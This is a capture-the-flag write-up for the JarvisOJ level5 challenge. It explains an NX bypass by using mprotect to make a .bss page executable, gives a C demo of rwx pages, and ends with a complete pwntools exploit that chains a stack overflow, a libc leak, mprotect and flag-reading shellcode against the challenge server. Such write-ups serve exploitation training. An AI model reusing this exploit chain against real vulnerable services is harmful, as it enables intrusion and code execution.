
[XMAN]level5

mmap and mprotect practice. Assume that the system and execve functions are disabled; try to solve this challenge using mmap and mprotect.

nc pwn2.jarvisoj.com 9884

The attachment is the same as level3_x64.

mmap maps a file or other object into memory; mprotect changes the permissions (rwx) of an existing range of addresses. The start address given to mprotect must be page-aligned (otherwise it fails with EINVAL), which is why the exploit below uses 0x600000 and a length of 0x1000: that page holds the binary's .got/.data/.bss and is already mapped writable.

The binary has NX enabled, so the stack and data are not executable. The plan is to use mprotect to make a page of the .bss/.data segment rwx, read shellcode into it, and return into it. Since system and execve are off the table, the shellcode just does open/read/write on the flag file. The chain is: overflow and leak write@got with write() to obtain the libc base, then build a second chain that calls mprotect(0x600000, 0x1000, 7) using pop rsi / pop rdx gadgets from libc (the binary itself has no pop rdx), then a third chain that calls read(0, 0x600000, len) and returns to 0x600000.
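The following is an added example, not part of the original write-up and not the challenge binary: a small Linux C program that does natively what the ROP chain makes level3_x64 do. It flips the page holding a .bss buffer to rwx with mprotect, copies a stub into it and calls it, and it also shows the alignment pitfall (an unaligned start address makes mprotect fail with EINVAL) and the mmap route the challenge mentions. The buffer name, the 0x500 offset and the six-byte stub are choices made for this example; the stub only runs on x86-64.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* A global buffer in .bss. In a non-PIE binary such as level3_x64 this is the
 * writable data page (0x600000 in the exploit) that the ROP chain flips to rwx.
 * 128 KiB so a whole page fits even on 64 KiB-page kernels. (Name is an
 * assumption of this example.) */
static unsigned char bss_buf[0x20000];

static uintptr_t page_size(void) { return (uintptr_t)sysconf(_SC_PAGESIZE); }

/* Round down to the page boundary: mprotect rejects an unaligned start. */
static uintptr_t page_align_down(uintptr_t addr) {
    return addr & ~(page_size() - 1);
}

/* mprotect the page(s) covering [addr, addr+len) to rwx, the way the exploit's
 * mprotect(0x600000, 0x1000, 7) does. Returns 0 on success, -errno on failure. */
static int make_rwx(void *addr, size_t len) {
    uintptr_t start = page_align_down((uintptr_t)addr);
    size_t span = ((uintptr_t)addr + len) - start;   /* kernel rounds len up */
    if (mprotect((void *)start, span, PROT_READ | PROT_WRITE | PROT_EXEC) != 0)
        return -errno;
    return 0;
}

/* The alignment pitfall: an address one byte past a page boundary inside
 * bss_buf is passed straight to mprotect (as if the chain used 0x600001).
 * Returns errno (EINVAL expected), or 0 if the call unexpectedly succeeded. */
static int unaligned_mprotect_errno(void) {
    uintptr_t p = page_align_down((uintptr_t)bss_buf + page_size()) + 1;
    if (mprotect((void *)p, page_size(), PROT_READ | PROT_WRITE | PROT_EXEC) == 0)
        return 0;
    return errno;
}

/* The mmap route the challenge also names: a fresh anonymous rwx page; no
 * alignment bookkeeping because the kernel picks the address. NULL on failure. */
static void *mmap_rwx_page(void) {
    void *p = mmap(NULL, page_size(), PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    return p == MAP_FAILED ? NULL : p;
}

/* Copy a stub into memory made executable by make_rwx and call it, mirroring
 * the exploit's final step (read shellcode to 0x600000, return into it). On
 * x86-64 the stub is "mov eax, 42 ; ret" and 42 comes back; on other
 * architectures nothing is executed and -1 is returned. */
static int run_stub_from(unsigned char *dst) {
#if defined(__x86_64__)
    static const unsigned char stub[] = { 0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3 };
    if (make_rwx(dst, sizeof stub) != 0)
        return -2;
    memcpy(dst, stub, sizeof stub);
    int (*fn)(void) = (int (*)(void))dst;
    return fn();
#else
    (void)dst;
    return -1;
#endif
}

/* Same offset into the page as the exploit's shellcode scratch area, 0x600500. */
static int run_stub_from_bss(void) { return run_stub_from(bss_buf + 0x500); }

int main(void) {
    printf("unaligned mprotect: errno %d (EINVAL is %d)\n",
           unaligned_mprotect_errno(), EINVAL);
    printf("stub in .bss returned %d\n", run_stub_from_bss());
    unsigned char *m = mmap_rwx_page();
    printf("stub in mmap page returned %d\n", m ? run_stub_from(m) : -3);
    return 0;
}
```

Build with `gcc -o rwx rwx.c` and run it; on a stock kernel the first call reports EINVAL and both stubs return 42. If a hardened kernel or an SELinux execmem policy forbids writable-and-executable mappings, make_rwx or mmap_rwx_page will fail, which is exactly the situation in which this mprotect technique would not work against the target either.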

The exploit is as follows:

from pwn import *

#io = process('./level3_x64')
io = remote('pwn2.jarvisoj.com', 9884)
elf = ELF('./level3_x64')
#libc = elf.libc
libc = ELF('./libc-2.19.so')
context.arch = 'amd64'
context.os = 'linux'
#context.log_level = 'debug'

# Gadgets and addresses from the non-PIE binary
pop_rdi = 0x4006b3
pop_rsi_r15 = 0x4006b1
write_plt = 0x4004B0
write_got = 0x600A58
read_plt = 0x4004C0
vuln_addr = 0x4005E6      # vulnerable function, re-entered after each chain

# Stage 1: overflow (136 bytes to the saved rip) and call write(1, write_got, ...) to leak write's libc address
payload = b'a' * 136 + p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(write_got)
payload += p64(0) + p64(write_plt) + p64(vuln_addr)
io.recvuntil(b'Input:\n')
io.send(payload)
write_addr = u64(io.recv(8))
info("write_addr:" + str(hex(write_addr)))
libc_base = write_addr - libc.symbols['write']
info("libc_base:" + str(hex(libc_base)))
# pop rsi / pop rdx gadgets from libc-2.19.so (the binary has no pop rdx)
pop_rsi = 0x24885 + libc_base
info("pop_rsi:" + str(hex(pop_rsi)))
pop_rdx = 0x286 + libc_base
info("pop_rdx:" + str(hex(pop_rdx)))
mprotect_addr = libc_base + libc.symbols['mprotect']
info("mprotect_addr:" + str(hex(mprotect_addr)))

# Stage 2: mprotect(0x600000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC)
# 0x600000 is page-aligned and is the page holding .got/.data/.bss
payload = b'a' * 136 + p64(pop_rdi) + p64(0x600000) + p64(pop_rsi) + p64(0x1000)
payload += p64(pop_rdx) + p64(7) + p64(mprotect_addr) + p64(vuln_addr)
io.recvuntil(b'Input:\n')
io.send(payload)

# Shellcode: open('./flag') then read/write it via fd 3 (assumes 0, 1, 2 are the only open fds)
# 0x600500 is scratch space inside the now-rwx page
shellcode = shellcraft.open('./flag')
shellcode += shellcraft.read(3, 0x600500, 0x100)
shellcode += shellcraft.write(1, 0x600500, 0x100)
shellcode = asm(shellcode)

# Stage 3: read(0, 0x600000, len(shellcode)) and return into 0x600000
payload = b'a' * 136 + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x600000)
payload += p64(pop_rdx) + p64(len(shellcode)) + p64(read_plt) + p64(0x600000)
io.recvuntil(b'Input:\n')
io.send(payload)
sleep(0.5)   # let the read() start before sending the shellcode so it is not merged with the payload
io.send(shellcode)
io.interactive()